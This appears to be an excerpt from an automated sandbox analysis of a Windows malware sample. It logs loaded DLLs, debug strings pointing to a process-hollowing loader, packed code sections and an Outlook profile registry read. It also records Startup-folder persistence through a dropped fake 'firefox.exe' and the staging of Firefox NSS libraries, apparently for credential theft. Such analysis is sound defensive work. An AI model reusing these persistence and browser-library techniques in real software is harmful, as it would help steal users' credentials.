Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: crtdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: jd4t3R7hOq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: jd4t3R7hOq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.7.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.7.dr
Source:	Binary string: ucrtbase.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.7.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.7.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.7.dr
Source:	Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: jd4t3R7hOq.exe, 00000003.00000002.2534600317.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, jd4t3R7hOq.exe, 00000003.00000002.2554670589.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2535455098.00000000024F1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.7.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.7.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, jd4t3R7hOq.exe, 00000007.00000002.1433821446.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.7.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr
Source:	Binary string: msvcp140.i386.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.7.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.7.dr
Source:	Binary string: ucrtbase.pdbUGP source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.7.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.7.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429903024.0000000004648000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.7.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.7.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.7.dr
Source:	Binary string: vcruntime140.i386.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.7.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.7.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.7.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.7.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.7.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.7.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: jd4t3R7hOq.exe, 00000007.00000002.1429979507.0000000004660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.7.dr

Source: jd4t3R7hOq.exe

Static PE information: 0x86919054 [Wed Jul 17 15:10:12 2041 UTC]

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_0040B15C

Source: msvcp140.dll.7.dr

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_06687060 push esp; iretd	3_2_06687065
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_0668218B push 0005CFE2h; iretd	3_2_0668219A
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_06687198 push eax; iretd	3_2_066871A5
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_06686CDB pushad ; retf	3_2_06686CE1
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_06685A03 push eax; iretd	3_2_06685A11
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_06685950 push eax; iretd	3_2_06685959
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 3_2_066859E8 push esp; iretd	3_2_066859F1
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0041C869 push edi; iretd	7_2_0041C872
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040D86E push 0040D89Ch; ret	7_2_0040D894
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040D870 push 0040D89Ch; ret	7_2_0040D894
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0041C873 push eax; iretd	7_2_0041C882
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_004140C0 push 004140ECh; ret	7_2_004140E4
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_004108C8 push 004108F4h; ret	7_2_004108EC
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040B0F7 push 0040B124h; ret	7_2_0040B11C
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040B0F8 push 0040B124h; ret	7_2_0040B11C
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00408080 push 004080B8h; ret	7_2_004080B0
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00408158 push 00408196h; ret	7_2_0040818E
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00408970 push 004089E4h; ret	7_2_004089DC
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00408994 push 004089E4h; ret	7_2_004089DC
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_004089AC push 004089E4h; ret	7_2_004089DC
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00415208 push 0041528Ch; ret	7_2_00415284
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040CA0C push 0040CA3Ch; ret	7_2_0040CA34
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040CA10 push 0040CA3Ch; ret	7_2_0040CA34
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00417AEC push 00417B18h; ret	7_2_00417B10
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_00404BC0 push 00404C11h; ret	7_2_00404C09
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040D3C0 push 0040D3ECh; ret	7_2_0040D3E4
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040A3E4 push 0040A410h; ret	7_2_0040A408
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040C390 push 0040C3C0h; ret	7_2_0040C3B8
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040C394 push 0040C3C0h; ret	7_2_0040C3B8
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040A3AC push 0040A3D8h; ret	7_2_0040A3D0
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Code function: 7_2_0040DC44 push 0040DCA3h; ret	7_2_0040DC9B

Source: jd4t3R7hOq.exe	Static PE information: section name: .text entropy: 7.558302936908568
Source: firefox.exe.5.dr	Static PE information: section name: .text entropy: 7.558302936908568

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
